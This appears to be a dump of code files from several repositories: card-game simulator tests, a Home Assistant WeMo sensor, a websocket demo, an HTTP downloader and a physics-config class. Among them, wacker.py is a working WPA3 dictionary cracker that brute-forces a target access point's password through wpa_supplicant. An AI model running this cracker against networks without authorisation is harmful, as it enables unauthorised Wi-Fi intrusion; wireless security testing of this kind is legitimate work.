self.assertEqual(23, game.players[1].hero.health)
self.assertFalse(game.players[0].minions[0].charge())
self.assertFalse(game.players[0].minions[1].charge())
self.assertTrue(game.players[0].minions[2].charge())
def test_AnimalCompanion(self):
game = generate_game_for(AnimalCompanion, StonetuskBoar, CardTestingAgent, DoNothingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual("Leokk", game.players[0].minions[0].card.name)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual("Leokk", game.players[0].minions[0].card.name)
self.assertEqual("Misha", game.players[0].minions[1].card.name)
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
self.assertEqual(5, game.players[0].minions[1].calculate_attack())
game.play_single_turn()
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual("Leokk", game.players[0].minions[0].card.name)
self.assertEqual("Misha", game.players[0].minions[1].card.name)
self.assertEqual("Huffer", game.players[0].minions[2].card.name)
def test_ScavengingHyena(self):
game = generate_game_for([ScavengingHyena, ScavengingHyena, Consecration], [StonetuskBoar, ShadowBolt],
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
self.assertEqual(2, game.players[0].minions[1].calculate_attack())
self.assertEqual(2, game.players[0].minions[0].health)
self.assertEqual(2, game.players[0].minions[1].health)
game.play_single_turn() # Kills 1 Hyena, other Hyena grows
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(3, game.players[0].minions[0].health)
def test_SnakeTrap(self):
game = generate_game_for([SnakeTrap, IronfurGrizzly], BluegillWarrior,
CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 5):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(1, len(game.players[0].secrets))
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(0, len(game.players[0].secrets))
def test_SnakeTrap_full_board(self):
game = generate_game_for([SnakeTrap, Onyxia], KingKrush, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 17):
game.play_single_turn()
self.assertEqual(7, len(game.current_player.minions))
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(0, len(game.other_player.minions))
game.play_single_turn() # Player 2 will play King Krush, which will charge a whelp
self.assertEqual(1, len(game.other_player.secrets)) # The snake trap will not be procced as the board is full
self.assertEqual(6, len(game.other_player.minions))
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(30, game.other_player.hero.health)
def test_Webspinner(self):
game = generate_game_for(Webspinner, MortalCoil, OneCardPlayingAgent, CardTestingAgent)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(0, len(game.other_player.minions))
self.assertEqual(4, len(game.other_player.hand))
self.assertEqual(MINION_TYPE.BEAST, game.other_player.hand[3].minion_type)
def test_CallPet(self):
game = generate_game_for([CallPet, CallPet, MoltenGiant, MoltenGiant, MoltenGiant, KingKrush, MoltenGiant,
MoltenGiant], MortalCoil, CardTestingAgent, DoNothingAgent)
for turn in range(0, 4):
game.play_single_turn()
# King Krush should cost 4 less (9 - 4 = 5)
self.assertEqual(5, len(game.players[0].hand))
self.assertEqual(5, game.players[0].hand[4].mana_cost())
for turn in range(0, 2):
game.play_single_turn()
# Molten Giant should not be affected since it's not a beast
self.assertEqual(20, game.players[0].hand[5].mana_cost())
def test_CobraShot(self):
game = generate_game_for(CobraShot, StonetuskBoar, CardTestingAgent, CardTestingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(30, game.players[1].hero.health)
self.assertEqual(7, len(game.players[1].minions))
game.play_single_turn()
self.assertEqual(27, game.players[1].hero.health)
self.assertEqual(6, len(game.players[1].minions))
def test_Glaivezooka(self):
game = generate_game_for([StonetuskBoar, Glaivezooka], StonetuskBoar, OneCardPlayingAgent, DoNothingAgent)
for turn in range(0, 2):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
game.play_single_turn()
self.assertEqual(2, game.players[0].weapon.base_attack)
self.assertEqual(2, game.players[0].weapon.durability)
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(2, game.players[0].minions[0].calculate_attack())
def test_MetaltoothLeaper(self):
game = generate_game_for([MetaltoothLeaper, Wisp], SpiderTank, OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(0, 8):
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[1].calculate_attack())
self.assertEqual(1, game.players[0].minions[0].calculate_attack())
self.assertEqual(2, len(game.players[1].minions))
self.assertEqual(3, game.players[1].minions[1].calculate_attack())
self.assertEqual(3, game.players[1].minions[0].calculate_attack())
# The second leaper will buff the first, but won't be buffed by anything
game.play_single_turn()
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(3, game.players[0].minions[0].calculate_attack())
self.assertEqual(1, game.players[0].minions[1].calculate_attack())
self.assertEqual(5, game.players[0].minions[2].calculate_attack())
def test_KingOfBeasts(self):
game = generate_game_for([StonetuskBoar, StonetuskBoar, StonetuskBoar, KingOfBeasts], StonetuskBoar,
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(9):
game.play_single_turn()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(5, game.current_player.minions[0].calculate_attack())
game.play_single_turn()
game.play_single_turn()
self.assertEqual(5, len(game.current_player.minions))
self.assertEqual(5, game.current_player.minions[1].calculate_attack())
def test_Gahzrilla(self):
game = generate_game_for([Gahzrilla, ShatteredSunCleric, RaidLeader], ArcaneExplosion,
OneCardPlayingAgent, OneCardPlayingAgent)
for turn in range(13):
game.play_single_turn()
self.assertEqual(6, game.current_player.minions[0].calculate_attack())
game.play_single_turn()
# Arcane explosion damages the Gahz'rilla, doubling its attack
self.assertEqual(12, game.other_player.minions[0].calculate_attack())
# The buff from the cleric is applied after the double, increasing attack by 1
game.play_single_turn()
self.assertEqual(13, game.current_player.minions[1].calculate_attack())
# Should double exactly the current attack
game.play_single_turn()
self.assertEqual(26, game.other_player.minions[1].calculate_attack())
# Raid leader gives a +1 Bonus
game.play_single_turn()
self.assertEqual(27, game.current_player.minions[2].calculate_attack())
# The raid leader's aura is not included in the double, but is applied afterwards
# Tested by @jleclanche for patch 2.1.0.7785
game.play_single_turn()
self.assertEqual(53, game.other_player.minions[1].calculate_attack())
def testGahzrilla_temp_buff(self):
env = self
class TestAgent(CardTestingAgent):
def do_turn(self, player):
super().do_turn(player)
if turn == 14:
# Gahz'rilla's double comes after the buff from abusive, so total attack is
# (6 + 2) * 2 = 16
env.assertEqual(16, game.current_player.minions[0].calculate_attack())
game = generate_game_for([Gahzrilla, AbusiveSergeant, Hellfire], StonetuskBoar,
TestAgent, DoNothingAgent)
for turn in range(15):
game.play_single_turn()
# After the buff wears off, the double no longer includes it, so the total attack is
# 6 * 2 = 12
# Tested by @jleclanche for patch 2.1.0.7785
self.assertEqual(12, game.current_player.minions[0].calculate_attack())
def test_ogre_misdirection(self):
game = generate_game_for(OgreBrute, Misdirection, PlayAndAttackAgent, OneCardPlayingAgent)
random.seed(1850)
for turn in range(0, 7):
game.play_single_turn()
self.assertEqual(26, game.players[0].hero.health)
self.assertEqual(30, game.players[1].hero.health)
def test_FeignDeath(self):
game = generate_game_for([HauntedCreeper, LootHoarder, Malorne, FeignDeath], StonetuskBoar,
OneCardPlayingAgent, DoNothingAgent)
for turn in range(14):
game.play_single_turn()
self.assertEqual(3, len(game.other_player.minions))
self.assertEqual(7, len(game.other_player.hand))
game.play_single_turn()
self.assertEqual(4, len(game.current_player.minions))
self.assertEqual(8, len(game.current_player.hand))
def test_SteamwheedleSniper(self):
game = generate_game_for(SteamwheedleSniper, StonetuskBoar, PredictableAgent, DoNothingAgent)
for turn in range(9):
game.play_single_turn()
self.assertEqual(2, len(game.current_player.minions))
self.assertEqual(22, game.other_player.hero.health)
self.assertEqual(1, game.current_player.minions[1].health)
self.assertEqual(3, game.current_player.minions[0].health)
def test_Quickshot(self):
game = generate_game_for(QuickShot, Wisp, CardTestingAgent, CardTestingAgent)
for turn in range(2):
game.play_single_turn()
self.assertEqual(5, len(game.players[1].minions))
self.assertEqual(4, len(game.players[0].hand))
game.play_single_turn()
# We should have played a quick shot and not drawn a card
self.assertEqual(30, game.players[1].hero.health)
self.assertEqual(4, len(game.players[1].minions))
self.assertEqual(4, len(game.players[0].hand))
game.play_single_turn()
game.play_single_turn()
# We should have played a quick shot and not drawn a card
self.assertEqual(30, game.players[1].hero.health)
self.assertEqual(4, len(game.players[1].minions))
self.assertEqual(4, len(game.players[0].hand))
game.play_single_turn()
game.play_single_turn()
# We should have played two shots and not drawn a card
self.assertEqual(30, game.players[1].hero.health)
self.assertEqual(3, len(game.players[1].minions))
self.assertEqual(3, len(game.players[0].hand))
game.play_single_turn()
game.play_single_turn()
# We should have played two shots and not drawn a card
self.assertEqual(30, game.players[1].hero.health)
self.assertEqual(2, len(game.players[1].minions))
self.assertEqual(2, len(game.players[0].hand))
game.play_single_turn()
game.play_single_turn()
# We should have played three shots and not drawn a card
self.assertEqual(30, game.players[1].hero.health)
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(1, len(game.players[0].hand))
game.play_single_turn()
game.play_single_turn()
# We should have played three shots, one of which was drawn, and have one card left over
self.assertEqual(24, game.players[1].hero.health)
self.assertEqual(0, len(game.players[1].minions))
self.assertEqual(1, len(game.players[0].hand))
def test_CoreRager(self):
game = generate_game_for([CoreRager, Deathwing], Wisp, OneCardPlayingAgent, DoNothingAgent)
for turn in range(18):
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(4, game.players[0].minions[0].calculate_attack())
self.assertEqual(4, game.players[0].minions[0].health)
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions)) # Deathwing discards whole hand
self.assertEqual(12, game.players[0].minions[0].calculate_attack())
self.assertEqual(12, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions)) # Deathwing the sequel
self.assertEqual(12, game.players[0].minions[0].calculate_attack())
self.assertEqual(12, game.players[0].minions[0].health)
game.play_single_turn()
game.play_single_turn()
self.assertEqual(2, len(game.players[0].minions)) # Core Rager activates battlecry
self.assertEqual(7, game.players[0].minions[0].calculate_attack())
self.assertEqual(7, game.players[0].minions[0].health)
def test_Acidmaw(self):
game = generate_game_for([Acidmaw, ArcaneExplosion, InjuredBlademaster], OasisSnapjaw,
CardTestingAgent, OneCardPlayingAgent)
for turn in range(14):
game.play_single_turn()
# Four snapjaws
self.assertEqual(4, len(game.current_player.minions))
# One Acidmaw
self.assertEqual(1, len(game.other_player.minions))
self.assertEqual("Acidmaw", game.other_player.minions[0].card.name)
game.play_single_turn()
# The snapjaws are dead from the arcane explosion
self.assertEqual(0, len(game.other_player.minions))
# The blademaster dies as well.
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual("Acidmaw", game.current_player.minions[0].card.name)
def test_BearTrap(self):
game = generate_game_for(BearTrap, StonetuskBoar, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 3):
game.play_single_turn()
self.assertEqual(1, len(game.players[1].minions))
self.assertEqual(1, len(game.players[0].secrets))
game.play_single_turn()
self.assertEqual(1, len(game.players[0].minions))
self.assertEqual(0, len(game.players[0].secrets))
def test_BearTrap_full_board(self):
game = generate_game_for([BearTrap, Onyxia], KingKrush, CardTestingAgent, PlayAndAttackAgent)
for turn in range(0, 17):
game.play_single_turn()
self.assertEqual(7, len(game.current_player.minions))
self.assertEqual(1, len(game.current_player.secrets))
self.assertEqual(0, len(game.other_player.minions))
game.other_player.agent.choose_target = lambda x: game.players[0].hero
game.play_single_turn() # Player 2 will play King Krush, which will charge the enemy hero's face
self.assertEqual(1, len(game.other_player.secrets)) # The bear trap will not be procced as the board is full
self.assertEqual(7, len(game.other_player.minions))
self.assertEqual(1, len(game.current_player.minions))
self.assertEqual(22, game.other_player.hero.health)
def test_Powershot(self):
game = generate_game_for(ManaWyrm, Powershot, OneCardPlayingAgent, CardTestingAgent)
for turn in range(0, 5):
game.play_single_turn()
game.players[1].agent.choose_target = lambda targets: targets[len(targets) - 2]
self.assertEqual(3, len(game.players[0].minions))
game.play_single_turn()
# Powershot the middle Wyrm
self.assertEqual(3, len(game.players[0].minions))
self.assertEqual(1, game.players[0].minions[0].health)
self.assertEqual(1, game.players[0].minions[1].health)
self.assertEqual(1, game.players[0].minions[2].health)
```
#### File: sdwle/testsSDW__copy/serialization_tests.py
```python
import json
from SDWLE.engine import Game
import testsSDW.copy_tests
class TestGameSerialization(testsSDW.copy_tests.TestGameCopying):
def setUp(self):
def _save_object(o):
return o.__to_json__()
def serialization_copy(old_game):
game_json = json.dumps(old_game, default=_save_object, indent=2)
d = json.loads(game_json)
game = Game.__from_json__(d, [player.agent for player in old_game.players])
game._has_turn_ended = old_game._has_turn_ended
return game
super().setUp()
self._old_copy = Game.copy
Game.copy = serialization_copy
def tearDown(self):
super().tearDown()
Game.copy = self._old_copy
class TestMinionSerialization(testsSDW.copy_tests.TestMinionCopying):
def setUp(self):
def _save_object(o):
return o.__to_json__()
def serialization_copy(old_game):
game_json = json.dumps(old_game, default=_save_object, indent=2)
d = json.loads(game_json)
game = Game.__from_json__(d, [player.agent for player in old_game.players])
game._has_turn_ended = old_game._has_turn_ended
return game
super().setUp()
self._old_copy = Game.copy
Game.copy = serialization_copy
def tearDown(self):
super().tearDown()
Game.copy = self._old_copy
``` |
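The serialization tests above replace `Game.copy` with a dump-and-reload round trip through each object's `__to_json__`/`__from_json__` hooks. A standalone sketch of that pattern, with all names illustrative rather than taken from the SDWLE engine:

```python
import json

class Point:
    """Toy object exposing the same JSON hooks the tests rely on."""
    def __init__(self, x, y):
        self.x, self.y = x, y

    def __to_json__(self):
        return {"x": self.x, "y": self.y}

    @classmethod
    def __from_json__(cls, d):
        return cls(d["x"], d["y"])

# Dump via the default hook, then rebuild: a copy by round trip.
dumped = json.dumps(Point(1, 2), default=lambda o: o.__to_json__(), indent=2)
copy = Point.__from_json__(json.loads(dumped))
print(copy.x, copy.y)  # 1 2
```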
{
"source": "jon102034050/home-assistant",
"score": 2
} |
#### File: components/wemo/binary_sensor.py
```python
import asyncio
import logging
from homeassistant.components.binary_sensor import BinarySensorEntity
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .const import DOMAIN as WEMO_DOMAIN
from .entity import WemoEntity
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up WeMo binary sensors."""
async def _discovered_wemo(coordinator):
"""Handle a discovered Wemo device."""
async_add_entities([WemoBinarySensor(coordinator)])
async_dispatcher_connect(hass, f"{WEMO_DOMAIN}.binary_sensor", _discovered_wemo)
await asyncio.gather(
*(
_discovered_wemo(coordinator)
for coordinator in hass.data[WEMO_DOMAIN]["pending"].pop("binary_sensor")
)
)
class WemoBinarySensor(WemoEntity, BinarySensorEntity):
"""Representation a WeMo binary sensor."""
@property
def is_on(self) -> bool:
"""Return true if the state is on. Standby is on."""
return self.wemo.get_state()
``` |
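Setup above first drains the `pending` coordinators with `asyncio.gather`, then relies on the dispatcher signal for anything discovered later. A framework-free sketch of that flush-then-subscribe flow (names here are illustrative, not Home Assistant APIs):

```python
import asyncio

async def add_entity(name):
    # Stand-in for async_add_entities([...]) in the snippet above.
    print("added", name)

async def main():
    pending = ["binary_sensor_a", "binary_sensor_b"]
    # Flush everything discovered before setup ran; later discoveries
    # would arrive through the dispatcher callback instead.
    await asyncio.gather(*(add_entity(name) for name in pending))

asyncio.run(main())
```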
{
"source": "Jon104/Vision-CPU",
"score": 3
} |
#### File: Jon104/Vision-CPU/server.py
```python
# Websocket demo, from iosoft.blog
import signal, sys, struct
from SimpleWebSocketServer import WebSocket, SimpleWebSocketServer
import numpy as np
from array import array
import json
import random
import time
PORTNUM = 8001
rList = [1, 2, 3, 4]
class Data:
def __init__(self, index):
self.index = index
def getData(self):
chata = [
-0.99,0,
-0.98,0,
-0.97,0,
-0.95,0.05,
-0.945,0.03,
-0.93,-0.7,
-0.926,-0.77,
-0.92,-0.8,
-0.914,-0.77,
-0.91,-0.7,
-0.89,0,
-0.87, 0.7,
-0.866,0.77,
-0.86,0.8,
-0.854,0.77,
-0.85,0.7,
-0.8275,0,
-0.81,-0.5,
-0.806,-0.57,
-0.80,-0.6,
-0.794,-0.57,
-0.79,-0.5,
-0.77,0,
-0.76,0.2,
-0.756,0.27,
-0.75,0.3,
-0.744,0.27,
-0.74,0.2,
-0.73,0,
-0.726,-0.07,
-0.72,-0.1,
-0.714,-0.07,
-0.71,0,
-0.705,0.02,
-0.7,0,
-0.06,0,
-0.05,-0.02,
-0.04,0.13,
-0.03,-0.27,
-0.02,0.27,
-0.01,-0.13,
0.0,0.02,
0.01,0,
0.06,0,
0.07,0.05,
0.08,-0.2,
0.09,0.4,
0.1,-0.4,
0.11,0.15,
0.12,-0.05,
0.13,0,
0.5,0,
0.73,0,
0.75,0,
0.749,0,
0.741,0,
0.74,0.5,
0.749,0.8,
0.9,0,
1.0,0
]
if (self.index % 2 == 1):
chata.append(0.4)
else:
chata.append(0.8)
chata.append(1.0)
self.index = self.index + 1
return chata
index = 1
# Websocket class to echo received data
class Echo(WebSocket):
def handleMessage(self):
for x in range(1):
global index
data=Data(index)
yop = json.dumps({"header": "ascan", "a": data.getData()})
self.sendMessage(yop.encode())
index = index + 1
def handleConnected(self):
print("Connected")
def handleClose(self):
print("Disconnected")
# Handle ctrl-C: close server
def close_server(signal, frame):
server.close()
sys.exit()
if __name__ == "__main__":
print("Websocket server on port %s" % PORTNUM)
server = SimpleWebSocketServer('0.0.0.0', PORTNUM, Echo)
print(server)
signal.signal(signal.SIGINT, close_server)
server.serveforever()
``` |
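Each reply from `handleMessage` above is a JSON envelope: a `header` tag plus a flat x,y array under `a`. A quick standalone check of that encoding (values illustrative):

```python
import json

# Flat [x0, y0, x1, y1, ...] payload, as Data.getData() builds it.
payload = {"header": "ascan", "a": [-0.99, 0, -0.98, 0, 1.0, 0]}
message = json.dumps(payload).encode()
print(message)  # b'{"header": "ascan", "a": [-0.99, 0, -0.98, 0, 1.0, 0]}'
```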
{
"source": "jon1scr/wacker",
"score": 2
} |
#### File: jon1scr/wacker/wacker.py
```python
import argparse
import logging
import os
import re
import signal
import socket
import stat
import subprocess
import sys
import time
def kill(sig, frame):
try:
wacker.kill()
except:
pass
sys.exit(0)
signal.signal(signal.SIGINT, kill)
class Wacker(object):
RETRY = 0
SUCCESS = 1
FAILURE = 2
def __init__(self, args, start_word, start_time):
self.args = args
self.start_time = start_time
self.start_word = start_word
self.dir = f'/tmp/wpa_supplicant'
self.server = f'{self.dir}/{args.interface}'
self.conf = f'{self.server}.conf'
self.log = f'{self.server}.log'
self.wpa = './wpa_supplicant-2.8/wpa_supplicant/wpa_supplicant'
self.pid = f'{self.server}.pid'
self.me = f'{self.dir}/{args.interface}_client'
self.cmd = f'{self.wpa} -P {self.pid} -B -i {self.args.interface} -c {self.conf}'
if args.debug:
self.cmd += f' -d -t -f {self.log}'
self.cmd = self.cmd.split()
wpa_conf = 'ctrl_interface={}\n\nnetwork={{\n}}'.format(self.dir)
self.total_count = int(subprocess.check_output(f'wc -l {args.wordlist.name}', shell=True).split()[0].decode('utf-8'))
# Create supplicant dir and conf (first be destructive)
os.system(f'mkdir {self.dir} 2> /dev/null')
os.system(f'rm -f {self.dir}/{args.interface}*')
with open(self.conf, 'w') as f:
f.write(wpa_conf)
loglvl = logging.DEBUG if args.debug else logging.INFO
logging.basicConfig(level=loglvl, filename=f'{self.server}_wacker.log', filemode='w', format='%(message)s')
def create_uds_endpoints(self):
''' Create unix domain socket endpoints '''
try:
os.unlink(self.me)
except Exception:
if os.path.exists(self.me):
raise
# bring the interface up... won't connect otherwise
os.system(f'ifconfig {self.args.interface} up')
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
self.sock.bind(self.me)
logging.info(f'Connecting to {self.server}')
try:
self.sock.connect(self.server)
except Exception:
raise
def start_supplicant(self):
''' Spawn a wpa_supplicant instance '''
print(f'Starting wpa_supplicant...')
proc = subprocess.Popen(self.cmd)
time.sleep(2)
logging.info(f'Started wpa_supplicant')
# Double check it's running
mode = os.stat(self.server).st_mode
if not stat.S_ISSOCK(mode):
raise Exception(f'Missing {self.server}...Is wpa_supplicant running?')
def send_to_server(self, msg):
''' Send a message to the supplicant '''
logging.debug(f'sending {msg}')
self.sock.sendall(msg.encode())
d = self.sock.recv(1024).decode().rstrip('\n')
if d == "FAIL":
raise Exception(f'{msg} failed!')
return d
def one_time_setup(self):
''' One time setup needed for supplicant '''
self.send_to_server('ATTACH')
self.send_to_server(f'SET_NETWORK 0 ssid "{self.args.ssid}"')
self.send_to_server(f'SET_NETWORK 0 key_mgmt SAE')
self.send_to_server(f'SET_NETWORK 0 bssid {self.args.bssid}')
self.send_to_server(f'SET_NETWORK 0 scan_freq {self.args.freq}')
self.send_to_server(f'SET_NETWORK 0 freq_list {self.args.freq}')
self.send_to_server(f'SET_NETWORK 0 ieee80211w 1')
self.send_to_server(f'DISABLE_NETWORK 0')
logging.debug(f'--- created network block 0 ---')
def send_connection_attempt(self, psk):
''' Send a connection request to supplicant'''
logging.info(f'Trying key: {psk}')
self.send_to_server(f'SET_NETWORK 0 sae_password "{psk}"')
self.send_to_server(f'ENABLE_NETWORK 0')
def listen(self, count):
''' Listen for responses from supplicant '''
while True:
datagram = self.sock.recv(2048)
if not datagram:
logging.error('WTF!!!! datagram is null?!?!?! Exiting.')
return Wacker.RETRY
data = datagram.decode().rstrip('\n')
event = data.split()[0]
logging.debug(data)
lapse = time.time() - self.start_time
self.print_stats(count, lapse)
if event == "<3>CTRL-EVENT-BRUTE-FAILURE":
logging.info('BRUTE ATTEMPT FAIL')
self.send_to_server(f'DISABLE_NETWORK 0')
logging.debug('\n{0} {1} seconds, count={2} {0}\n'.format("-"*15, lapse, count))
return Wacker.FAILURE
elif event == "<3>CTRL-EVENT-BRUTE-SUCCESS":
logging.info('BRUTE ATTEMPT SUCCESS')
logging.debug('\n{0} {1} seconds, count={2} {0}\n'.format("-"*15, lapse, count))
return Wacker.SUCCESS
else:
# do something with <3>CTRL-EVENT-SSID-TEMP-DISABLED ?
pass
def print_stats(self, count, lapse):
''' Print some useful stats '''
avg = count / lapse
spot = self.start_word + count
est = (self.total_count - spot) / avg
percent = spot / self.total_count * 100
end = time.strftime('%d %b %Y %H:%M:%S', time.localtime(start_time + est))
print(f'{spot:8} / {self.total_count:<8} words ({percent:2.2f}%) : {avg:6.2f} words/sec : ' \
f'{lapse/3600:5.3f} hours lapsed : {est/3600:6.2f} hours to exhaust ({end})', end='\r')
def kill(self):
''' Kill the supplicant '''
print('\nStop time: {}'.format(time.strftime('%d %b %Y %H:%M:%S', time.localtime(time.time()))))
os.kill(int(open(self.pid).read()), signal.SIGKILL)
def check_bssid(mac):
if not re.match(r'^([0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})$', mac):
raise argparse.ArgumentTypeError(f'{mac} is not a valid bssid')
return mac
def check_interface(interface):
if not os.path.isdir(f'/sys/class/net/{interface}/wireless/'):
raise argparse.ArgumentTypeError(f'{interface} is not a wireless adapter')
return interface
parser = argparse.ArgumentParser(description='A WPA3 dictionary cracker. Must run as root!')
parser.add_argument('--wordlist', type=argparse.FileType('r'), required=True, help='wordlist to use', dest='wordlist')
parser.add_argument('--interface', type=check_interface, dest='interface', required=True, help='interface to use')
parser.add_argument('--bssid', type=check_bssid, dest='bssid', required=True, help='bssid of the target')
parser.add_argument('--ssid', type=str, dest='ssid', required=True, help='the ssid of the WPA3 AP')
parser.add_argument('--freq', type=int, dest='freq', required=True, help='frequency of the ap')
parser.add_argument('--start', type=str, dest='start_word', help='word to start with in the wordlist')
parser.add_argument('--debug', action='store_true', help='increase logging output')
args = parser.parse_args()
if os.geteuid() != 0:
print('This script must be run as root!')
sys.exit(0)
# Find requested startword
offset = 0
start_word = 0
if args.start_word:
print(f'Starting with word "{args.start_word}"')
for word in args.wordlist:
if word.rstrip('\n') == args.start_word:
args.wordlist.seek(offset, os.SEEK_SET)
break
offset += len(word.encode('utf-8'))
start_word += 1
else:
print(f'Requested start word "{args.start_word}" not found!')
sys.exit(1)
start_time = time.time()
print('Start time: {}'.format(time.strftime('%d %b %Y %H:%M:%S', time.localtime(start_time))))
wacker = Wacker(args, start_word, start_time)
wacker.start_supplicant()
wacker.create_uds_endpoints()
wacker.one_time_setup()
# Start the cracking
count = 1
for word in args.wordlist:
word = word.rstrip('\n')
wacker.send_connection_attempt(word)
result = wacker.listen(count)
if result == Wacker.SUCCESS:
print(f"\nFound the password: '{word}'")
break
#elif result == Wacker.RETRY:
# pass
count += 1
else:
print('\nFlag not found')
wacker.kill()
``` |
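wacker drives wpa_supplicant through a Unix-domain datagram socket: one `sendall` and one `recv` per control command, with `FAIL` treated as an error. The round-trip shape can be seen in isolation with a socketpair (a sketch only; the real peer is the supplicant's control socket, and AF_UNIX socketpairs require a Unix-like OS):

```python
import socket

# A connected pair of AF_UNIX datagram sockets stands in for the
# client <-> wpa_supplicant control-socket pair.
client, supplicant = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM)
client.sendall(b'SET_NETWORK 0 ssid "test"')
print(supplicant.recv(1024))   # the command, as the supplicant would see it
supplicant.sendall(b'OK')
print(client.recv(1024))       # b'OK' -- send_to_server raises on b'FAIL'
```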
{
"source": "jon2180/gdzwfw-crawler",
"score": 3
} |
#### File: jon2180/gdzwfw-crawler/html_downloader.py
```python
import socket
import traceback
from http.client import HTTPResponse
from urllib import request, parse, error
from config import user_agent
def try_catch(cb):
def wrapped_func(*args, **kw):
try:
data = cb(*args, **kw)
return data
except error.ContentTooShortError as e:
# print(f'{args}: [ContentTooShort] download failed\n{e.reason}')
traceback.print_exc()
print('\n')
return cb(*args, **kw)
except error.HTTPError as e:
# print(f'{url}: [HttpError] download failed\n{e.reason}')
traceback.print_exc()
print('\n')
return cb(*args, **kw)
# return fetch_html(url)
except socket.timeout as e:
# print(f'{url}: [SocketTimeout] download failed\n')
traceback.print_exc()
print('\n')
return cb(*args, **kw)
# return fetch_html(url)
except error.URLError as e:
if isinstance(e.reason, socket.timeout):
# print('socket timed out - URL %s', url)
return cb(*args, **kw)
# return fetch_html(url)
else:
print('some other error happened')
# print(f'{url}: [URLError] download failed\n{e.reason}')
traceback.print_exc()
print('\n')
return cb(*args, **kw)
# return fetch_html(url)
except Exception as e:
# print(f'{url}: download failed\n')
traceback.print_exc()
print('\n')
return None
return wrapped_func
@try_catch
def fetch_html(url, timeout: 'float' = 60):
req = request.Request(url)
req.add_header("User-Agent", user_agent)
res = request.urlopen(req, timeout=timeout)
assert isinstance(res, HTTPResponse)
html_doc = res.read()
res.close()
return html_doc
def build_post_body(query) -> bytes:
post_body = parse.urlencode(query).encode('utf-8')
return post_body
@try_catch
def fetch_json(url: 'str', post_body: 'bytes', refer: 'str', content_type: 'str'):
req = request.Request(url, post_body)
req.add_header("User-Agent", ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)"
" Chrome/87.0.4280.88 Safari/537.36"))
req.add_header("Content-Type", content_type)
req.add_header("Referer", refer)
res = request.urlopen(req, timeout=60)
assert isinstance(res, HTTPResponse)
json_doc = res.read()
res.close()
return json_doc
``` |
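`try_catch` above is a retry-on-exception decorator: most network failures simply re-invoke the wrapped fetch once more. A stripped-down, self-contained version of the same pattern (names illustrative):

```python
import functools

def retry_once(cb):
    """Re-invoke cb one time if it raises a network-style error."""
    @functools.wraps(cb)
    def wrapped(*args, **kw):
        try:
            return cb(*args, **kw)
        except OSError:
            # one retry, then let any further failure propagate
            return cb(*args, **kw)
    return wrapped

@retry_once
def fetch():
    return "ok"

print(fetch())  # ok
```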
{
"source": "jon2718/ipycool_2.0",
"score": 2
} |
#### File: jon2718/ipycool_2.0/beamtype.py
```python
from container import *
from distribution import *
from correlation import *
class BeamType(Container):
"""
A BeamType is a:
(1) PARTNUM (I) particle number
(2) BMTYPE (I) beam type {magnitude = mass code; sign = charge}
1: e
2: μ
3: π
4: K
5: p
6: d
7: He3
8: Li7
(3) FRACBT (R) fraction of beam of this type {0-1} The sum of all fracbt(i) should =1.0
(4) Distribution
(5) NBCORR # of beam correlations {0-10}
(6) From 0-10 enclosed Correlation objects as specified by NBCORR (5)
"""
allowed_enclosed_commands = ['Correlation']
command_params = {
'partnum': {
'desc': 'Particle number',
'doc': '',
'type': 'Integer',
'req': True,
'default': None},
'bmtype': {
'desc': 'beam type {magnitude = mass code; sign = charge}: 1: e, 2: μ, 3: π, 4: K, 5: p, '
'6: d, 7: He3, 8: Li7',
'doc': '',
'out_dict': {
'e': 1,
'mu': 2,
'pi': 3,
'k': 4,
'p': 5,
'd': 6,
'he3': 7,
'li7': 8},
'type': 'Integer',
'req': True,
'default': None},
'fractbt': {
'desc': 'Fraction of beam of this type {0-1} The sum of all fracbt(i) should =1.0',
'doc': '',
'type': 'Real',
'req': True,
'default': None},
'distribution': {
'desc': 'Beam distribution object',
'doc': '',
'type': 'Distribution',
'req': True,
'default': None},
'nbcorr': {
'desc': '# of beam correlations {0-10}',
'doc': '',
'type': 'Integer',
'req': True,
'default': 0,
'min': 0,
'max': 10}}
def __init__(self, **kwargs):
